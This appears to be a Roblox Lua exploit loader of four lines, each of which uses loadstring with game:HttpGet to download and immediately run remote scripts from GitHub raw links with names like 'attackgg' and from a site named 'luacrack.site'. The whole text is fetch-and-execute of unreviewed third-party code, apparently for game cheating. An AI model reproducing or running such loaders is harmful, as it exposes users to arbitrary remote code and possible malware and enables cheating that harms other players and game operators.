loadstring(game:HttpGet("https://github.com/TlDinhKhoi/Util/raw/refs/heads/main/NewAc/attackgg.txt"))()

loadstring(game:HttpGet("https://github.com/TlDinhKhoi/Util/raw/refs/heads/main/NewAc/Api.luau.txt"))()

loadstring(game:HttpGet("https://github.com/TlDinhKhoi/Util/raw/refs/heads/main/NewAc/ApiTeddy.txt"))()

loadstring(game:HttpGet("https://luacrack.site/index.php/InfinityScript/raw/NotifySvInfinity"))()
